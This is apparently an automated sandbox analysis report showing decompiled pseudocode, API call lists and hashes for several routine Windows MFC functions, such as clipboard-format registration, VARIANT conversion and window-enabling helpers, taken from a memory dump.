Instruction Fuzzy Hash: CFF0F871D407489BD730BF729D09B47BAE5EFC4B10F02192EE2818BA90E6B6E4409F44

Uniqueness

Uniqueness Score: -1.00%

Function 0043BEBD, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043BEBD() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x452a54 =  *0x452a54 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x452a54 = _t6;
					return _t6;
				}
			}

0x0043bece
0x0043bed8
0x0043bedc
0x0043bef8
0x0043bef8
0x00000000
0x0043bef8
0x0043bede
0x0043bee4
0x00000000
0x00000000
0x00000000
0x0043bee6
0x0043bee6
0x0043beeb
0x0043bef1
0x00000000
0x0043bef1

APIs

GetVersion.KERNEL32 ref: 0043BEC5
GetVersion.KERNEL32 ref: 0043BED0
GetVersion.KERNEL32 ref: 0043BED8
GetVersion.KERNEL32 ref: 0043BEDE
RegisterClipboardFormatA.USER32 ref: 0043BEEB

Strings

MSWHEEL_ROLLMSG, xrefs: 0043BEE6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$ClipboardFormatRegister
String ID: MSWHEEL_ROLLMSG
API String ID: 2888461884-2485103130
Opcode ID: 0d24befb2ae8d05da5236b3160f385d9eb081832e5951939dda6a65550d5c13d
Instruction ID: 2e0143c44d68de2814956bdc80c20222312dd3f269a57e0f17f577e5b19e0a6a
Opcode Fuzzy Hash: 0d24befb2ae8d05da5236b3160f385d9eb081832e5951939dda6a65550d5c13d
Instruction Fuzzy Hash: 78E04F7A90111386D6112B7DAE017E76B95CB9C351F1620779B0042650DB6C484B8AEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBB5, Relevance: 9.4, APIs: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041EBB5(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t340;
				signed short _t342;
				void* _t343;
				intOrPtr* _t344;
				signed int _t345;
				void* _t347;
				signed long long _t357;

				_t337 = __edx;
				_t282 = __ecx;
				_t345 = _t347 - 0x64;
				_t163 =  *0x44f5d0; // 0x8e7de579
				 *(_t345 + 0x68) = _t163 ^ _t345;
				_push(0xcc);
				E004271DA(E0043B0DB, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t345 + 0x4c)) =  *((intOrPtr*)(_t345 + 0x74));
				_t339 = __ecx;
				 *(_t345 + 0x30) = 0;
				if((0 |  *((intOrPtr*)(__ecx + 0x48)) != 0x00000000) == 0) {
					L1:
					E00415838(_t282);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E00422542(_t345 + 0x3c);
				_t342 = 3;
				 *((intOrPtr*)(_t345 - 4)) = 0;
				 *(_t345 + 0x50) = _t342;
				E0041C6DB(0,  *((intOrPtr*)(_t339 + 0x54)), _t345,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
				if( *(_t345 + 0x50) != _t342) {
					_t178 = E0041A795(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t345 + 0x50) & 0x0000ffff;
						_t344 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E0041C3FE(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t345 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t345 + 0x55) > 0) {
											do {
												_t139 = _t345 + 0x55;
												 *_t139 =  *(_t345 + 0x55) - 1;
												__eflags =  *_t139;
												_t357 = _t357 /  *0x43f6c0;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t345 + 0x56);
										if( *(_t345 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t345 - 0x14) = _t357;
										 *(_t345 - 0x1c) = 5;
										 *((char*)(_t345 - 4)) = 0xe;
										E00422522(_t345 - 0x1c, _t345 + 0x3c, _t345 - 0x1c);
										_t203 = _t345 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E0041C428(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t345 + 0x58) = _t357;
											_t337 =  *(_t345 + 0x34);
											 *((intOrPtr*)(_t345 + 0x60)) = 0;
											E0041A634(_t345 + 0x58, _t339, __eflags,  *(_t345 + 0x34),  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t345 = 7;
											 *(_t345 + 8) =  *(_t345 + 0x58);
											 *((char*)(_t345 - 4)) = 0xf;
											E00422522(_t345, _t345 + 0x3c, _t345);
											_t203 = _t345;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E0041C428(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t345 + 0x58) = _t357;
												 *((intOrPtr*)(_t345 + 0x60)) = 0;
												E0041A694( *(_t345 + 0x34) & 0x0000ffff,  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff);
												 *(_t345 - 0x4c) = 7;
												 *(_t345 - 0x44) =  *(_t345 + 0x58);
												 *((char*)(_t345 - 4)) = 0x10;
												E00422522(_t345 - 0x4c, _t345 + 0x3c, _t345 - 0x4c);
												_t203 = _t345 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E0041C45D(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E0041C62B(_t345 - 0xd8,  *((short*)(_t345 + 0x54)),  *(_t345 + 0x56) & 0x0000ffff,  *(_t345 + 0x58) & 0x0000ffff,  *(_t345 + 0x5a) & 0x0000ffff,  *(_t345 + 0x5c) & 0x0000ffff,  *(_t345 + 0x5e) & 0x0000ffff);
													 *(_t345 - 0x3c) = 7;
													 *((long long*)(_t345 - 0x34)) =  *_t231;
													 *((char*)(_t345 - 4)) = 0x11;
													E00422522(_t345 - 0x3c, _t345 + 0x3c, _t345 - 0x3c);
													_t203 = _t345 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E00401EE0(0, _t345, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
								 *((char*)(_t345 - 4)) = 2;
								_t237 = E004227DC(0, _t345 - 0xbc, _t339, _t344, __eflags);
								 *((char*)(_t345 - 4)) = 3;
								E00422522(_t237, _t345 + 0x3c, _t237);
								 *_t344(_t345 - 0xbc,  *_t235, 8);
								_t295 =  *(_t345 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E0042246B(_t345 - 0x9c,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t345 - 4)) = 0xb;
										E00422522(_t243, _t345 + 0x3c, _t243);
										_t203 = _t345 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E004226E0(0, _t345 - 0x8c, _t339, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
											 *((char*)(_t345 - 4)) = 1;
											E00422522(_t246, _t345 + 0x3c, _t246);
											_t203 = _t345 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
													 *(_t345 - 0x5c) = 0x11;
													 *((char*)(_t345 - 0x54)) =  *_t248;
													 *((char*)(_t345 - 4)) = 6;
													E00422522(_t345 - 0x5c, _t345 + 0x3c, _t345 - 0x5c);
													_t203 = _t345 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E004155EA(0, _t345 + 0x30, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 4;
										_t189 = E004227DC(0, _t345 - 0xcc, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 5;
										E00422522(_t189, _t345 + 0x3c, _t189);
										 *_t344(_t345 - 0xcc,  *_t187, 8, E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
										_t295 =  *(_t345 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t345 - 4)) = 0;
										E00401E60(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E0042246B(_t345 - 0xac,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t345 - 4)) = 7;
											E00422522(_t254, _t345 + 0x3c, _t254);
											_t203 = _t345 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E00422492(_t345 - 0x7c,  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))), 3);
												 *((char*)(_t345 - 4)) = 8;
												E00422522(_t257, _t345 + 0x3c, _t257);
												_t203 = _t345 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t345 + 0x50) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
													 *(_t345 + 0x10) = 4;
													 *(_t345 + 0x18) =  *(_t345 + 0x50);
													 *((char*)(_t345 - 4)) = 9;
													E00422522(_t345 + 0x10, _t345 + 0x3c, _t345 + 0x10);
													_t203 = _t345 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t345 - 0x24) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
														 *(_t345 - 0x2c) = 5;
														 *((char*)(_t345 - 4)) = 0xa;
														E00422522(_t345 - 0x2c, _t345 + 0x3c, _t345 - 0x2c);
														_t203 = _t345 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
															 *(_t345 + 0x20) = 6;
															 *((intOrPtr*)(_t345 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t345 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t345 - 4)) = 0xd;
															E00422522(_t345 + 0x20, _t345 + 0x3c, _t345 + 0x20);
															_t203 = _t345 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t345 - 0x64) =  *(E0041A7C6(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
																 *(_t345 - 0x6c) = 7;
																 *((char*)(_t345 - 4)) = 0xc;
																E00422522(_t345 - 0x6c, _t345 + 0x3c, _t345 - 0x6c);
																_t203 = _t345 - 0x6c;
																L30:
																 *((char*)(_t345 - 4)) = 0;
																 *_t344(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E004226E0(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
						 *_t344(_t345 + 0x3c);
					}
				} else {
					L4:
					E004226E0(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
					__imp__#9(_t345 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t345 - 0xc));
				_pop(_t340);
				_pop(_t343);
				_pop(_t281);
				return E0042569C( *((intOrPtr*)(_t345 + 0x4c)), _t281,  *(_t345 + 0x68) ^ _t345, _t337, _t340, _t343);
			}

APIs

__EH_prolog3.LIBCMT ref: 0041EBD1
VariantClear.OLEAUT32(?), ref: 0041EC36

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

VariantClear.OLEAUT32(?), ref: 0041EE45
VariantClear.OLEAUT32(?), ref: 0041EEB7
VariantClear.OLEAUT32(?), ref: 0041F0A8

Part of subcall function 00422522: VariantCopy.OLEAUT32(?,?), ref: 00422530

Part of subcall function 004227DC: __EH_prolog3.LIBCMT ref: 004227E6
Part of subcall function 004227DC: lstrlenA.KERNEL32(?,00000224,0041F074,?,00000008,00000000,?,000000CC), ref: 00422805
Part of subcall function 004227DC: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 0042280D

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$H_prolog3$AllocByteCopyException@8StringThrowlstrlen
String ID:
API String ID: 1791476184-0
Opcode ID: 6f531d27ff53acd8f02cfb2516c0923a91e79e3ce4c3643383baee003c901264
Instruction ID: 5581f08e52af421ef9c8ee28c0fdc7925d332395fb2106e801205c28927e399c
Opcode Fuzzy Hash: 6f531d27ff53acd8f02cfb2516c0923a91e79e3ce4c3643383baee003c901264
Instruction Fuzzy Hash: BCF1813450014CEADF15EFA1C8909FE7BB9AF08304F44815BFC5293291DB78DA89DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004234F0, Relevance: 9.1, APIs: 6, Instructions: 118
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004234F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x44f5d0; // 0x8e7de579
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E004277B0(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E00416D15(_t74, 0x43fb18);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t47 = E00416D15(_t74, 0x43eed0);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E0040E878(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E0040E878(_t74, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E00415700(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E00415700(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040E67F(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E00415700(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040E67F(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E00401E60( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E0042569C(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}

APIs

_memset.LIBCMT ref: 0042351F
SysAllocString.OLEAUT32(00000000), ref: 00423570
SysAllocString.OLEAUT32(00000000), ref: 00423594

Part of subcall function 00415700: __EH_prolog3.LIBCMT ref: 00415707

SysAllocString.OLEAUT32(00000000), ref: 004235EC
SysAllocString.OLEAUT32(00000000), ref: 00423615
SysAllocString.OLEAUT32(00000000), ref: 00423644

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: 325f9cc5fa8ca118e27e7f32e288bfa91b50bda65fdb05eb54b1ef442072e336
Instruction ID: 9c01246f313d45af70bf27f06baaae5a18734526c2a04a99717f9e2c99b62bdd
Opcode Fuzzy Hash: 325f9cc5fa8ca118e27e7f32e288bfa91b50bda65fdb05eb54b1ef442072e336
Instruction Fuzzy Hash: F6416F30A00218DFCB34AF79D881A9EB7B5BF54314F50852FE465A72E2DB78A944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD73, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040DD73(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t71;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x44f5d0; // 0x8e7de579
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E0040DC94(0);
				_t63 = E0040DCC8(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E0040DBFD(_t64, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E0040DC94(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E0042569C(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}

APIs

Part of subcall function 0040DCC8: GetParent.USER32(?), ref: 0040DD1B
Part of subcall function 0040DCC8: GetLastActivePopup.USER32(?), ref: 0040DD2A
Part of subcall function 0040DCC8: IsWindowEnabled.USER32(?), ref: 0040DD3F
Part of subcall function 0040DCC8: EnableWindow.USER32(?,00000000), ref: 0040DD52

EnableWindow.USER32(?,00000001), ref: 0040DDC0
GetWindowThreadProcessId.USER32(?,?), ref: 0040DDCE
GetCurrentProcessId.KERNEL32 ref: 0040DDD8
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0040DDED
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040DE6A
EnableWindow.USER32(?,00000001), ref: 0040DEA6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: ebb91f4f9c23817995b6fbd71b736e976144b2346346b7f2189059c6cd601d45
Instruction ID: 3e0975815654ba29b9fd2e6189b03887221eb6c9a09134e4549fe7e71712cb9d
Opcode Fuzzy Hash: ebb91f4f9c23817995b6fbd71b736e976144b2346346b7f2189059c6cd601d45
Instruction Fuzzy Hash: 71419032E007089FEB309FA4DC85B9EB7B5AF15714F24003AE905AB2C1D7789948CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCC8, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCC8(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E0040DBF1();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E0040A3FC();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 0040DCFA
GetParent.USER32(?), ref: 0040DD08
GetParent.USER32(?), ref: 0040DD1B
GetLastActivePopup.USER32(?), ref: 0040DD2A
IsWindowEnabled.USER32(?), ref: 0040DD3F
EnableWindow.USER32(?,00000000), ref: 0040DD52

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 1a19f39ab51fab3e4b5f9f51d1c5c276803f9ae97a759c2700da5930deac3b70
